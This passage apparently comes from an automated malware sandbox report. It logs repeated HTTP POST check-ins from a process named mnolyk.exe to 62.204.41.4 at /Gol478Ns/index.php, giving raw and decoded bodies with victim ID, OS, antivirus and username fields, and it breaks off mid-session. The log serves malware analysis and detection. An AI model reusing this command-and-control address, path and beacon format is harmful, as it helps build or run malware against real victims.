                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        281192.168.2.54997162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:04.128226995 CET482OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:04.192429066 CET482INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        282192.168.2.54997262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:04.364384890 CET483OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:04.428808928 CET483INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        283192.168.2.54997362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:04.598156929 CET484OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:04.660758972 CET484INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        284192.168.2.54997462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:04.837733984 CET485OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:04.902610064 CET485INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        285192.168.2.54997562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:05.084398031 CET486OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:05.149620056 CET486INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        286192.168.2.54997662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:05.318607092 CET487OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:05.384452105 CET487INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        287192.168.2.54997762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:05.552321911 CET488OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:05.615860939 CET488INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        288192.168.2.54997862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:05.789921045 CET489OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:05.854299068 CET489INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        289192.168.2.54997962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:06.054835081 CET490OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:06.118680954 CET490INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        29192.168.2.54971962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:38.598088026 CET229OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:38.666188002 CET230INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        290192.168.2.54998062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:06.304827929 CET491OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:06.367547035 CET491INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        291192.168.2.54998162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:06.537805080 CET492OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:06.602508068 CET492INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        292192.168.2.54998262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:06.788989067 CET493OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:06.852390051 CET | 493 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        293 | 192.168.2.5 | 49983 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:07.033596039 CET | 494 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:07.099112988 CET | 494 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        294 | 192.168.2.5 | 49984 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:07.273531914 CET | 495 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:07.337085009 CET | 495 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        295 | 192.168.2.5 | 49985 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:07.516140938 CET | 496 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:07.578883886 CET | 496 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        296 | 192.168.2.5 | 49986 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:07.762954950 CET | 497 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:07.826908112 CET | 497 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        297 | 192.168.2.5 | 49987 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:08.011491060 CET | 498 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:08.074615002 CET | 498 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        298 | 192.168.2.5 | 49988 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:08.271365881 CET | 499 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:08.335114002 CET | 499 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        299 | 192.168.2.5 | 49989 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:08.504518032 CET | 500 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
